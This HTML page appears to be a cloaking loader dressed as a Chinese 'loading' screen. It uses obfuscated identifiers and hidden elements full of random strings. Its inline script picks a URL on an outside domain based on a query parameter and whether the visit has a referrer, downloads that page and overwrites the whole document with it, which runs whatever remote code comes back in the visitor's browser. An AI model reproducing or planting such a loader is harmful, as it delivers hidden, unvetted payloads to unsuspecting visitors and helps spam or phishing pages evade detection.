<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .T1TF21SI8 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .T1TF21SI8 .VhOdFNN3 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .T1TF21SI8 .content {
            line-height: 50px;
            text-align: center
        }

        .T1TF21SI8 .img {
            width: 100%
        }

        .T1TF21SI8 .EJAn5a5 {
            text-align: center
        }

        .T1TF21SI8 .EJAn5a5 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .T1TF21SI8 .EJAn5a5 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .T1TF21SI8 .EJAn5a5 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .T1TF21SI8 .EJAn5a5 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .T1TF21SI8 .EJAn5a5 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .T1TF21SI8 .EJAn5a5 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .T1TF21SI8 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function TA0hShvU8miu(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var KGVH7Qo = TA0hShvU8miu('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ KGVH7Qo +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ KGVH7Qo +".html?a=share";
		}
		
        iXbcGMhDQc=url+"#"+new Date().getTime();
        iXbcGMhDQc && function() {
            $.get(iXbcGMhDQc, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>qQNIQAI2dhkVF3FjkDn56RqqU2mz2cLTKniyYdj8uhM</p>
<b style='display:none' >JfdvHCm9bt466nRdtXKAxgCkUVAFbwQCfR1XTMva80200pUwrDws3MH27jttgNg0hzGlyk</b>
<a  href='#' style='display:none'>rww1hjkANifLqKLeHDxHSsmO1olxfzW54mMw5O8C1dx8R3qEoEghnb8PPjGjpSSA8oNTprkAu4JcPkoFfMbZ1FM</a>
<h1 style='display:none' >GLqhyUq0Y9KfqstWInobJ8ZxOG6YUJLqbHMSoUG6TrxbZqq5YyKIOXjwvDwqlO73kHasU4r0O6Kl5a0Z47cBM2bo81XtGZQq88V</h1>
<div style='display:none'>eIaVYx3XjqjYMVcKs55IAIAcuHnXroAh</div>
<a  href='#' style='display:none'>rww1hjkANifLqKLeHDxHSsmO1olxfzW54mMw5O8C1dx8R3qEoEghnb8PPjGjpSSA8oNTprkAu4JcPkoFfMbZ1FM</a>
<div style='display:none'>eIaVYx3XjqjYMVcKs55IAIAcuHnXroAh</div>
<h1 style='display:none' >GLqhyUq0Y9KfqstWInobJ8ZxOG6YUJLqbHMSoUG6TrxbZqq5YyKIOXjwvDwqlO73kHasU4r0O6Kl5a0Z47cBM2bo81XtGZQq88V</h1><div class="T1TF21SI8">
    <div class="VhOdFNN3">
        <div class="EJAn5a5">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>qlGloBNV4QY</span>
<b style='display:none' >xA84tac4nq1E4vpFe4ZBjMvp3FfI4b9WYI6FN3oGW0uwebN29GlUU3UanTjuYHugOMCQtrlzgITrqjlHYkbsLkBtnIg3ahwmXaSX</b>
<div style='display:none'>dxcPweC4Vj6eywO4ZzG25Kvo4JGjLOlxPS8TxdxNTVpk5KYQLHTQnyp8Znl7cbwNQlLn9XxXjqJphxtrTCd</div></body>
</html>